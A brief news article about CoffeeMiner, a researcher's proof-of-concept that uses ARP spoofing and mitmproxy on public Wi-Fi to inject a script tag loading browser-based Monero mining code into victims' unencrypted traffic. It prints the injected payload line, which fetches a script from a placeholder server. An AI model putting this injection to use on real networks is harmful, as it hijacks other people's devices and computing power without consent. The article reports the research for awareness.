mine using Wi-Fi networks

An independent information security specialist, known as Arnau, published an interesting proof-of-concept, called CoffeeMiner, and an associated study. The expert was inspired to create this project by an incident that occurred in December 2017 in Buenos Aires. Then it turned out that the local Starbucks coffee shop network offers its visitors not just a Wi-Fi connection, but hidden cryptocurrency mining using devices connected to the public network.

Arnau emphasizes that it publishes the CoffeeMiner concept and source code exclusively as a theoretical academic study designed for educational and research purposes. The attack, in essence, repeats what happened in Argentina and allows for a kind of man-in-the-middle attack. CoffeeMiner is designed to spoof Address Resolution Protocol (ARP) to intercept unencrypted traffic from devices located on the same network. The well-known mitmproxy tool is used to inject HTML code into insecure traffic, it looks like this:

<_script src=»http:_//httpserverIP:8000/script_.js» type=»text/javascript»></_script>

As a result, JavaScript will be launched, which will delay the resources of the victim's CPU for mining. In his tests, the researcher used the popular "browser" mining script Coinhive and mined the Monero cryptocurrency.